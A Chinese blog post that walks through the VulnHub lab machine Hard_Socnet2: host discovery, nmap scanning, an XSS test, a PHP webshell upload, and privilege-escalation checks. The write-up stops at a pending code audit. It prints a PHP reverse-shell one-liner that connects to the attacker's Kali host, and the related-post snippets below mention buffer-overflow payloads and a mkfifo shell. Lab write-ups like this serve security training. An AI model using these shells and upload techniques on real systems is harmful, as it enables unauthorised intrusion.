VulnHub靶机-Hard_Socnet2 |红队打靶03

最新推荐文章于 2024-08-05 21:05:25 发布
最新推荐文章于 2024-08-05 21:05:25 发布
阅读量432 收藏
点赞数 1
分类专栏: 红队打靶 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47289634/article/details/131844654
版权

文章目录

靶机地址:

https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

一、主机发现

netdiscover -r 192.168.56.0/24

在这里插入图片描述

靶机的ip:192.168.56.101

kali的ip:192.168.56.102

二、对靶机进一步探测

1、对靶机开放端口、运行的服务和操作系统进行探测

nmap -sV -sC -O -p- 192.168.56.101

在这里插入图片描述

靶机开放了22,80,8000三个端口
22跑的是OpenSSH的服务,80端口是apache的http服务,8000端口是python运行的一个BaseHTTPServer;
操作系统探测是Linux 3.2 - 4.9 。

2、访问80,8000端口的http服务

访问8000端口,提示请求方法不对,那么利用burp批量探测一下
在这里插入图片描述
都不行
在这里插入图片描述
访问80端口,是一个登录框,可以注册用户,注册进去看一下

进去后是个类似留言板的东西,输入个xss语句,还真的执行了
在这里插入图片描述
发现还可以上传图片,通过浏览器插件看到脚本语言是php和python
在这里插入图片描述

三、获取shell

上传个php的webshell,右击刚才上传图片的地址,用冰蝎连接
在这里插入图片描述
成功拿到网站的shell,看一下是否在docker里,发现不在
在这里插入图片描述

四、提权

反弹shell

在蚁剑端,将shell反弹到kali
在这里插入图片描述

php -r '$sock=fsockopen("192.168.56.102",443);exec("/bin/sh -i <&3 >&3 2>&3");'

反弹成功
在这里插入图片描述
查看sudo -l,自动任务/etc/crontab,都没有可以利用的
在这里插入图片描述

当来到home下,发现有socnet用户,进去发现ls -la发现一个拥有suid和guid权限的文件,add_record,且是个可执行的文件
在这里插入图片描述
留言中admin提到一个monitor.py文件,刚好在这个文件中,查看一下
在这里插入图片描述
发现引入了SimpleXMLRPCServer这个模块,并且这个服务开放在8000端口,这也就解释了前面为什么8000端口,用平常的http请求方法访问不了

代码审计

待定
在这里插入图片描述

青衫木马牛
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
(vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3541
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机、kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、808000端口 获取webshell: 先访问80端口,是
vulnhub-hard_socnet2
m0_67219349的博客
12-07 431
vulnhub-hard_socnet2
Vulnhub-Hard_socnet2
qq_52579508的博客
06-28 603
python 2.7 版本,介绍了 BaseHTTPServer 这个库的使用方法。这个库是 python 自带的标准库的一部分,不需要额外安装,在 linux 系统下,位置在 /usr/lib/python2.7/BaseHTTPServer.py。
Hard_socnet2(逆向调试提权)
weixin_46591320的博客
12-02 367
逆向提权
hard_socnet2靶场渗透测试
qq_41567985的博客
11-07 172
①先进行简单测试:通过脚本请求了服务端的cpu信息,服务端接受到cpu请求后,通过其API接口执行了客户端的请求,查询到了目标服务器CPU的信息。关于汇编代码简单的说,一个程序在执行中,CPU会给其分配很多内存地址,内存地址中携带了很多指令,程序的处理等,最后再将运算结果输出。直接输入id就能发现我们进入了一个交互式的shell,并且我们的id是0,root权限,到此就成功提权了。从这个add程序的运行来看也不列外,当我在运行这条程序时,首先弹出了欢迎页面,然后在弹出了一些指定的提示。
hard_socnet2靶机打靶过程及思路
qq_52610024的博客
04-16 2177
mkfifo/tmp/f;以及sysytem函数,backdoor函数,继续disasvuln查看vuln函数的汇编代码,发现里面使用了strcpy。函数,可能存在缓冲区溢出的一个c语言函数,disasbackdoor查看汇编代码,发现使用了一个setuid函数。一个内建函数,是一个自定义函数,infofunction查看当前应用程序的使用函数信息,发现setuid函数。内建函数,break*地址,添加断点,命令s单步执行,继续观察,观察到vuln-弱点,这个单词,发现不是。...
kali之vulnhub,hardsocnet2
weixin_54431413的博客
05-15 998
一、利用最近公布的ubuntu 8.4 内核提权漏洞来进行了提取,简便的得到了服务器root权限。 二、利用缓冲区溢出来执行admin留下的backdoor来获得root权限,涉及gdb调试,汇编语言等
hard_socnet2靶机之SQL注入、文件上传利用、CVE-2021-3493、缓冲区溢出、逆向工程
qq_40898302的博客
05-12 508
print('aa\n1\n1\n1\n' + 'A'*62 + struct.pack('I', 0x08048676))" > payload #生成payload。系统主程序执行vulnvuln函数有漏洞)函数,vuln加载backdoor函数,backdoor调用系统suid和system。#在对方服务器生成paylaod,0x08048676是backdoor的起始编号。
hard_socnet2靶机渗透测试
weixin_58786230的博客
07-12 118
【代码】hard_socnet2靶机渗透测试。
hard_socnet靶机vulnhub
wcl20010的博客
05-03 1301
这个靶机的难度很高。慢慢摸索,接触新知识。 https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova 靶场链接:链接:https://pan.baidu.com/s/1HaAn_3cF-vFCgnoQ1IC75Q 提取码:ifat 1.主机发现 arp-scan -l 2.端口扫描 3.漏洞利用 显示的是不支持GET请求,那就去抓包用 ...
Bulldog:2靶机渗透
weixin_34345560的博客
02-07 290
文章首发圈子社区:https://www.secquan.org/Notes/1068825 前言 前两天做了一个靶机渗透题目,在此记录一下 靶机信息: 靶机名称 Bulldog:2 渗透步骤: 一、获取靶机IP 成功搭建靶机后,界面显示了ip地址: 但如果靶机没有显示ip,可以用nmap扫描网段得到ip。 二、浏览网站 网站的功能很简单,注册、登录以及浏览一些...
渗透靶机扫描不到ip地址
qq_63283137的博客
09-23 1879
原因一、没有开启nat模式原因二、虚拟网络编辑器错误原因三、靶机网卡配置错误。
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1059
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8365
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 518
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 720
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
网络安全中的IOC是指的什么?
Nove1205的博客
08-02 408
一分钟让你了解网络安全中的IOC是什么
自学黑客(网络安全
最新发布
2301_77160226的博客
08-05 1075
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值